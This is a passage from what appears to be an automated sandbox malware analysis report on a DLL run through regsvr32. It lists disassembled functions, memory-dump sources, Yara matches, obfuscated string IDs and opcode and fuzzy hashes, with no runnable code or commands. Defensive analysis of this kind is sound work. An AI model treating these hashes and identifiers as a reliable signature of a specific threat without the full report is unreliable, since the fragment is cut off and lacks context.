                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BC450 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$_getptd
                                                                    • String ID:
                                                                    • API String ID: 1743167714-0
                                                                    • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                    • Instruction ID: a8c21e9c1da4ee91f59da8303864f677d3eca12a6470222bbd3162463c771de8
                                                                    • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                    • Instruction Fuzzy Hash: A1615F72B08A86D6DB789E60F95A3E97391FB88386F500176D72DC7280CF3CE4688741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 6e4761af9cbbc7e56b0ebe3f2fd9ebbf1bb807a40d07775ef569cdf1f58d0d70
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 6e4761af9cbbc7e56b0ebe3f2fd9ebbf1bb807a40d07775ef569cdf1f58d0d70
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: 8e62bb2442717ef834bc9e0d2db0d031a8489eaa3450fb87a3fdc8a088d62545
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: 8e62bb2442717ef834bc9e0d2db0d031a8489eaa3450fb87a3fdc8a088d62545
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180027F9C Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >97"$?$LsRW$~x
                                                                    • API String ID: 0-2554301858
                                                                    • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                    • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                    • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                    • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 044ffeba6cf6caf628ab0d946c02a3f7d28cd574b6d4e2350068ec5c70ab2904
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 044ffeba6cf6caf628ab0d946c02a3f7d28cd574b6d4e2350068ec5c70ab2904
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BAF70 Relevance: 4.9, APIs: 3, Instructions: 435COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$__tzset
                                                                    • String ID:
                                                                    • API String ID: 3587134695-0
                                                                    • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                    • Instruction ID: e3602274a81d0fc65edb05a4fb1d0d0fbe42e8d88151e3f5d53e7fe4151f49f9
                                                                    • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                    • Instruction Fuzzy Hash: 9902A336A08746C6E7748E29F0BA93C3791FB46BC0F64807AD76E866D5CE78E54C8701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BFB6C Relevance: 4.6, APIs: 3, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointer_lock
                                                                    • String ID:
                                                                    • API String ID: 2175075375-0
                                                                    • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                    • Instruction ID: 3bb6f2f0fc3e1c204e3f9c227f52f394983eb6fb9982a09ac93bbdce168b2f9a
                                                                    • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                    • Instruction Fuzzy Hash: 4131AD21B0C75382FB759E65B57B37A6181AF543C4F0444B4EF6EC6A86EE2CE4488300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BD318 Relevance: 4.5, APIs: 3, Instructions: 43COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlCaptureContext.KERNEL32 ref: 00007FF8CA9BD357
                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9BD39D
                                                                    • UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9BD3A8
                                                                      • Part of subcall function 00007FF8CA9B6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B6FCF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                    • String ID:
                                                                    • API String ID: 2731829486-0
                                                                    • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                    • Instruction ID: 017e46ca43d9f523886d5330eca585479730ebc504da1368897956b9a2011cc6
                                                                    • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                    • Instruction Fuzzy Hash: D9114225628B5682F7349F50F46A3BA6391FF85388F4411BAE65D83AE5DF3DE008CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001496C Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *4$5F$S^r
                                                                    • API String ID: 0-3556444313
                                                                    • Opcode ID: 32f12f089b8a2f529f06453d9d247e753f5514636137a2d7872eb14875660eb0
                                                                    • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                    • Opcode Fuzzy Hash: 32f12f089b8a2f529f06453d9d247e753f5514636137a2d7872eb14875660eb0
                                                                    • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001BB04 Relevance: 4.0, Strings: 3, Instructions: 286COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: &lz2$'~W$<x<
                                                                    • API String ID: 0-2268522332
                                                                    • Opcode ID: d353bb3380a978666a479ee450a37b931469c1cc25af52acd29372fd61dce81c
                                                                    • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                    • Opcode Fuzzy Hash: d353bb3380a978666a479ee450a37b931469c1cc25af52acd29372fd61dce81c
                                                                    • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000BDD0 Relevance: 4.0, Strings: 3, Instructions: 262COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: o6.$s8Q${Fl&
                                                                    • API String ID: 0-2665016659
                                                                    • Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                    • Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
                                                                    • Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                    • Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180020768 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$T]0$ba^2
                                                                    • API String ID: 0-1276948933
                                                                    • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                    • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                    • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                    • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001D49C Relevance: 4.0, Strings: 3, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6w5*$EDO$V
                                                                    • API String ID: 0-1640223502
                                                                    • Opcode ID: 944acd662e311639990576df567dfaf1aeae203cd7960374855798ea7e62004e
                                                                    • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                    • Opcode Fuzzy Hash: 944acd662e311639990576df567dfaf1aeae203cd7960374855798ea7e62004e
                                                                    • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000A6EC Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Y()$i_"o$|Y
                                                                    • API String ID: 0-942011364
                                                                    • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                    • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                    • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                    • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180017378 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O)$,G$-
                                                                    • API String ID: 0-23008916
                                                                    • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                    • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                    • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                    • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000A270 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
